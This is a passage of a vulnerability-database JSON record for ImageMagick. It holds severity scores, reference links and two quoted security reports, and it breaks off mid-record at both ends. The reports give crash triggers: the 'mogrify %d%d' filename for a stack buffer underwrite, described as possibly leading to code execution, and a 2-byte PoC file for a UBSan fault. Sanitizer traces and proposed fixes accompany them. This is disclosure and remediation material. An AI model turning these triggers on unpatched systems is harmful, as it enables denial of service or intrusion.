"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" }, { "value": "1.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fff3-4rp7-px97", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "1.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" }, { "value": "2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-18T15:52:04Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fff3-4rp7-px97" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68469", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" }, { "value": "1.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68469" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423598", "reference_id": "2423598", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423598" }, { "reference_url": "https://github.com/advisories/GHSA-fff3-4rp7-px97", "reference_id": "GHSA-fff3-4rp7-px97", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fff3-4rp7-px97" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-68469", "GHSA-fff3-4rp7-px97" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7t1t-1spz-gfee" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/28405?format=api", "vulnerability_id": "VCID-9ewm-6688-kkar", "summary": "ImageMagick has a Stack Buffer Overflow in image.c\nHi, we have found a stack buffer overflow and would like to report this issue.\nCould you confirm if this qualifies as a security vulnerability? I am happy to provide any additional information needed.\n\n## Summary\n\nIn ImageMagick's `magick mogrify` command, specifying multiple consecutive `%d` format specifiers in a filename template causes internal pointer arithmetic to generate an address below the beginning of the stack buffer, resulting in a stack overflow through `vsnprintf()`.\n\n### Additional information\n\n Upon further investigation, we found that the same issue occurs not only with mogrify but also with the following subcommands: compare, composite, conjure, convert, identify, mogrify, and montage.\n\nFurthermore, we confirmed that this vulnerability has the potential to lead to RCE. RCE is possible when ASLR is disabled and there is a suitable one_gadget in libc, provided that options and filenames can be controlled.\n\n## Details\n\n- **Vulnerability Type:** CWE-124: Buffer Underwrite\n- **Affected Component:** MagickCore/image.c - Format processing within InterpretImageFilename()\n- **Affected Version:** ImageMagick 7.1.1-47 (as of commit 82572afc, June 2025)\n- **CWE-124: Buffer Underwrite:** A vulnerability where writing occurs to memory addresses before the beginning of a buffer. This is caused by a design flaw in fixed offset correction, resulting in negative pointer arithmetic during consecutive format specifier processing.\n\n## Reproduction\n\n### Tested Environment\n\n- **Operating System:** Ubuntu 22.04 LTS\n- **Architecture:** x86_64\n- **Compiler:** gcc with AddressSanitizer (gcc version: 11.4.0)\n\n### Reproduction Steps\n\n```bash\n# Clone source\ngit clone --depth 1 --branch 7.1.1-47 https://github.com/ImageMagick/ImageMagick.git ImageMagick-7.1.1\ncd ImageMagick-7.1.1\n\n# Build with ASan\nCFLAGS=\"-g -O0 -fsanitize=address -fno-omit-frame-pointer\" CXXFLAGS=\"$CFLAGS\" LDFLAGS=\"-fsanitize=address\" ./configure --enable-maintainer-mode --enable-shared && make -j$(nproc) && make install\n\n# Trigger crash\n./utilities/magick mogrify %d%d\n```\n\n### Output\n\n```plaintext\n==4155==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda834caae at pc 0x7f1ea367fb27 bp 0x7ffda834b680 sp 0x7ffda834ae10\nWRITE of size 2 at 0x7ffda834caae thread T0\n #0 0x7f1ea367fb26 in __interceptor_vsnprintf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1668\n #1 0x7f1ea2dc9e3e in FormatLocaleStringList MagickCore/locale.c:470\n #2 0x7f1ea2dc9fd9 in FormatLocaleString MagickCore/locale.c:495\n #3 0x7f1ea2da0ad5 in InterpretImageFilename MagickCore/image.c:1696\n #4 0x7f1ea2c6126b in ReadImages MagickCore/constitute.c:1051\n #5 0x7f1ea27ef29b in MogrifyImageCommand MagickWand/mogrify.c:3858\n #6 0x7f1ea278e95d in MagickCommandGenesis MagickWand/magick-cli.c:177\n #7 0x560813499a0c in MagickMain utilities/magick.c:153\n #8 0x560813499cba in main utilities/magick.c:184\n #9 0x7f1ea1c0bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #10 0x7f1ea1c0be3f in __libc_start_main_impl ../csu/libc-start.c:392\n #11 0x560813499404 in _start (/root/workdir/ImageMagick/utilities/.libs/magick+0x2404)\n\nAddress 0x7ffda834caae is located in stack of thread T0 at offset 62 in frame\n #0 0x7f1ea2c60f62 in ReadImages MagickCore/constitute.c:1027\n\n This frame has 2 object(s):\n [32, 40) 'images' (line 1033)\n [64, 4160) 'read_filename' (line 1029) <== Memory access at offset 62 underflows this variable\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork\n (longjmp and C++ exceptions *are* supported)\nSUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1668 in __interceptor_vsnprintf\nShadow bytes around the buggy address:\n 0x100035061900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061920: 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3\n 0x100035061930: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00\n 0x100035061940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x100035061950: f1 f1 00 f2 f2[f2]00 00 00 00 00 00 00 00 00 00\n 0x100035061960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x1000350619a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==4155==ABORTING\n```\n\n### Affected Code\n\nIn `MagickCore/image.c`, within the `InterpretImageFilename()` function:\n\n```c\nMagickExport size_t InterpretImageFilename(const ImageInfo *image_info,\n Image *image,const char *format,int value,char *filename,\n ExceptionInfo *exception)\n{\n...\n for (p=strchr(format,'%'); p != (char *) NULL; p=strchr(p+1,'%'))\n {\n q=(char *) p+1;\n if (*q == '%')\n {\n p=q+1;\n continue;\n }\n field_width=0;\n if (*q == '0')\n field_width=(ssize_t) strtol(q,&q,10);\n switch (*q)\n {\n case 'd':\n case 'o':\n case 'x':\n {\n q++;\n c=(*q);\n *q='\\0';\n /*--------Affected--------*/\n (void) FormatLocaleString(filename+(p-format-offset),(size_t)\n (MagickPathExtent-(p-format-offset)),p,value);\n offset+=(4-field_width);\n /*--------Affected--------*/\n *q=c;\n (void) ConcatenateMagickString(filename,q,MagickPathExtent);\n canonical=MagickTrue;\n if (*(q-1) != '%')\n break;\n p++;\n break;\n }\n case '[':\n {\n ...\n }\n default:\n break;\n }\n }\n```\n\n## Technical Analysis\n\nThis vulnerability is caused by an inconsistency in the template expansion processing within `InterpretImageFilename()`.\n\nThe format specifiers `%d`, `%o`, and `%x` in templates are replaced with integer values by `FormatLocaleString()`, but the output buffer position is calculated by `filename + (p - format - offset)`.\n\nThe `offset` variable is cumulatively incremented to correct the output length of `%d` etc., but the design using a static `offset += (4 - field_width)` causes `offset` to increase excessively when `%` specifiers are consecutive in the template, creating a dangerous state where the write destination address points before `filename`.\n\nThe constant `4` was likely chosen based on the character count of typical format specifiers like `%03d` (total of 4 characters: `%`, `0`, `3`, `d`). However, in reality, there are formats with only 2 characters like `%d`, and formats with longer width specifications (e.g., `%010d`), so this uniform constant-based correction is inconsistent with actual template structures.\n\nAs a result, when the correction value becomes excessive, `offset` exceeds the relative position `p - format` within the template, generating a negative index. This static and template-independent design of the correction processing is the root cause of this vulnerability.\n\nThis causes `vsnprintf()` to write outside the stack buffer range, which is detected by AddressSanitizer as a `stack-buffer-overflow`.\n\n## Proposed Fix\n\nIn `MagickCore/image.c`, within the `InterpretImageFilename()` function:\n\n```c\nMagickExport size_t InterpretImageFilename(const ImageInfo *image_info,\n Image *image,const char *format,int value,char *filename,\n ExceptionInfo *exception)\n{\n...\n /*--------Changed--------*/\n ssize_t\n field_width,\n offset,\n written; // Added\n /*--------Changed--------*/\n...\n for (p=strchr(format,'%'); p != (char *) NULL; p=strchr(p+1,'%'))\n {\n q=(char *) p+1;\n if (*q == '%')\n {\n p=q+1;\n continue;\n }\n field_width=0;\n if (*q == '0')\n field_width=(ssize_t) strtol(q,&q,10);\n switch (*q)\n {\n case 'd':\n case 'o':\n case 'x':\n {\n q++;\n c=(*q);\n *q='\\0';\n written = FormatLocaleString(filename+(p-format-offset),(size_t)\n (MagickPathExtent-(p-format-offset)),p,value);\n /*--------Changed--------*/\n if (written <= 0 || written > (MagickPathExtent - (p - format - offset)))\n return 0;\n offset += (ssize_t)((q - p) - written);\n /*--------Changed--------*/\n *q=c;\n (void) ConcatenateMagickString(filename,q,MagickPathExtent);\n canonical=MagickTrue;\n if (*(q-1) != '%')\n break;\n p++;\n break;\n }\n case '[':\n {\n ...\n }\n default:\n break;\n }\n }\n```\n- By updating `offset` based on the difference between template description length `(q - p)` and the number of output bytes `written`, buffer position consistency is maintained.\n- Correction is performed according to the actual template structure, ensuring stable behavior regardless of format length without relying on static constants.\n- Range checking of `written` allows detection of vsnprintf failures and excessive writes.\n\n### Commits\nFixed in https://github.com/ImageMagick/ImageMagick/commit/66dc8f51c11b0ae1f1cdeacd381c3e9a4de69774 and https://github.com/ImageMagick/ImageMagick6/commit/643deeb60803488373cd4799b24d5786af90972e", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53101.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53101.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53101", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28113", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28046", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28256", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28213", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29849", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.30063", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.30067", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.30023", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29973", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29989", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29968", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29923", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53101" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53101", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53101" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick6/commit/643deeb60803488373cd4799b24d5786af90972e", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/643deeb60803488373cd4799b24d5786af90972e" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/66dc8f51c11b0ae1f1cdeacd381c3e9a4de69774", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:27:44Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/66dc8f51c11b0ae1f1cdeacd381c3e9a4de69774" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qh3h-j545-h8c9", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:27:44Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qh3h-j545-h8c9" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53101", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53101" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339", "reference_id": "1109339", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379947", "reference_id": "2379947", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379947" }, { "reference_url": "https://github.com/advisories/GHSA-qh3h-j545-h8c9", "reference_id": "GHSA-qh3h-j545-h8c9", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qh3h-j545-h8c9" }, { "reference_url": "https://usn.ubuntu.com/7728-1/", "reference_id": "USN-7728-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7728-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-53101", "GHSA-qh3h-j545-h8c9" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9ewm-6688-kkar" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/27360?format=api", "vulnerability_id": "VCID-a2qm-vkc3-qkd5", "summary": "ImageMagick has Undefined Behavior (function-type-mismatch) in CloneSplayTree\n## Summary\n- **Target:** ImageMagick (commit `ecc9a5eb456747374bae8e07038ba10b3d8821b3`)\n- **Type:** Undefined Behavior (function-type-mismatch) in splay tree cloning callback\n- **Impact:** Deterministic abort under UBSan (DoS in sanitizer builds). No crash in a non-sanitized build; likely low security impact.\n- **Trigger:** Minimal **2-byte** input parsed via MagickWand, then coalescing.\n## Environment\nOS: macOS (Apple Silicon/arm64)\nHomebrew clang version 20.1.8\nTarget: arm64-apple-darwin24.5.0\nThread model: posix\nInstalledDir: /opt/homebrew/Cellar/llvm/20.1.8/bin\nConfiguration file: /opt/homebrew/etc/clang/arm64-apple-darwin24.cfg\nHomebrew ImageMagick: `magick -version` → `ImageMagick 7.1.2-0 Q16-HDRI aarch64`\npkg-config: `MagickWand-7.Q16HDRI` version `7.1.2`\nLibrary configure flags (capsule build):\n./configure --disable-shared --enable-static --without-modules --without-magick-plus-plus --disable-openmp --without-perl --without-x --with-png=yes --without-jpeg --without-tiff --without-xml --without-lqr --without-gslib\nHarness compile flags:\n-fsanitize=fuzzer,address,undefined -fno-omit-frame-pointer\npkg-config cflags/libs supplied:\n-I<...>/include/ImageMagick-7\n-DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 -DMAGICKCORE_CHANNEL_MASK_DEPTH=32\nand linked against MagickWand-7.Q16HDRI and MagickCore-7.Q16HDRI\nSanitizer runtime:\nASan+UBSan defaults. Repro also with `UBSAN_OPTIONS=print_stacktrace=1:halt_on_error=1`\n## PoC\n- **Bytes (hex):** `1c 02`\n- **Base64:** `HAI=`\n - **sha256 (optional):** <fill in>\n## Reproduction\nCreate PoC:\n\n`printf '\\x1c\\x02' > poc.bin`\n\nOption A: libFuzzer harness\n- Run once: `./harness_ImageMagick_... -runs=1 ./poc.bin`\n- Expected: UBSan aborts with function-type-mismatch at `MagickCore/splay-tree.c:372:43`.\n\nOption B: standalone reproducer (C)\n- Compile (ensure `PKG_CONFIG_PATH` points to your ImageMagick if needed):\n\n/opt/homebrew/opt/llvm/bin/clang -g -O1 -fsanitize=address,undefined $(/opt/homebrew/bin/pkg-config --cflags MagickWand-7.Q16HDRI) repro.c -o repro $(/opt/homebrew/bin/pkg-config --libs MagickWand-7.Q16HDRI)\n\n- Run:\n\nUBSAN_OPTIONS=print_stacktrace=1:halt_on_error=1 ./repro ./poc.bin\nObserved output (excerpt)\nMagickCore/splay-tree.c:372:43: runtime error: call to function ConstantString through pointer to incorrect function type 'void *(*)(void *)'\nstring.c:680: note: ConstantString defined here\n#0 CloneSplayTree splay-tree.c:372\n#1 CloneImageProfiles profile.c:159\n#2 CloneImage image.c:832\n#3 CoalesceImages layer.c:269\n#4 MagickCoalesceImages magick-image.c:1665\n#5 main repro.c:XX\nRoot cause\nThe splay tree clone callback expects a function pointer of type `void *(*)(void *)`. ConstantString has a different signature (`char *ConstantString(const char *)`). Calling through the mismatched function type is undefined behavior in C and triggers UBSan’s function-type-mismatch.\nThe path is exercised during coalescing: CloneImage → CloneImageProfiles → CloneSplayTree.\nScope\nReproduces with a minimal, sanitizer-instrumented, PNG-enabled build and delegates disabled (policy.xml), suggesting the issue is in MagickCore rather than external delegates.\nSuggested fix (sketch)\nUse a wrapper that matches the expected callback prototype, or adjust the splay-tree callback typedef for const-correctness. For example:\nstatic void *CloneStringShim(const void *p) {\nreturn (void *) ConstantString((const char *) p);\n}\n\n/* When setting splay-tree clone_value, use CloneStringShim instead of ConstantString. */\n\nAlternatively, update the clone callback typedefs to use const void* consistently (and return void*) and ensure callers pass a correctly typed wrapper.\n\nArtifacts\nMinimised PoC: attached (poc.bin, 2 bytes; base64 HAI=)\nHarness source and exact build command (attached)\nFull UBSan trace (attached)\nCommit SHA and configure flags (above)\nCredits\nDiscovered by: Lumina Mescuwa\nMethod: libFuzzer + UBSan\nVerification\n- UBSan build: Reproduces with `halt_on_error=1`; aborts at `MagickCore/splay-tree.c:372`.\n- Non-sanitized Homebrew build (macOS arm64, clang 20.1.8): No crash; repro completes silently.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55160.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55160.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55160", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12321", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12414", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12454", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12492", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.1252", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.1247", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.1239", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.1254", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12582", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13574", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.1349", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13561", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55160" }, { "reference_url": 